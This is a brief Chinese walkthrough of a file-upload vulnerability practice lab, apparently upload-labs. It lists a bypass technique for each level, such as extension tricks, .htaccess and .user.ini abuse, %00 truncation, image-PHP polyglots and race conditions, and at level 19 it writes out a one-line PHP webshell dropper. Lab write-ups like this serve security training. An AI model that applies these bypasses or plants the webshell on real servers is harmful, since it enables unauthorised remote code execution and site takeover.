第一关
上传并进行抓包,修改后缀为php

第二关
抓包修改后缀

第三关
改后缀为php3

第4关
使用Apache的配置文件.htaccess来上传文件

然后再上传php文件

第5关
使用.user.ini来上传文件


然后再上传jpg文件

访问upload目录下的readme.php文件

第6关
大小写绕过

第7关
空格


第8关
后缀加点


第9关
数据流
在后缀后加::$DATA


第10关
点空格点


第11关
双写绕过


第12关
使用%00截断


第13关
%00 空格

将%00进行url编码

将空格20修改成00


将url中,10.php后的内容全部删除,然后访问

第14关
准备一张.jpg的图片和一个.php的代码
打开终端,进入到当前文件夹
copy 图片名/b+代码文件名/a 合成后的文件名

点击黄色文字

复制图片路径

在黄字后输入?file=图片地址,访问

第15关

此关同上一关
第16关
第17关
使用反二次渲染的图片


之后过程跟十四关一样

第18关
生成一句话木马的文件

抓包,用攻击器攻击

攻击的同时访问这个文件,使其在目录里生成木马文件,来绕过
第19关
这关我们要修改一下第十九关的文件

然后就是和上一关一样了
生成<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
并合成木马图片

然后上传,并抓包用攻击器进行无限次攻击

第20关
后缀名黑名单
上传的文件名用户可控
黑名单用于用户输入的文件后缀名进行判断
move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /.
准备PHP一句话木马,并把后缀名改为PNG再上传

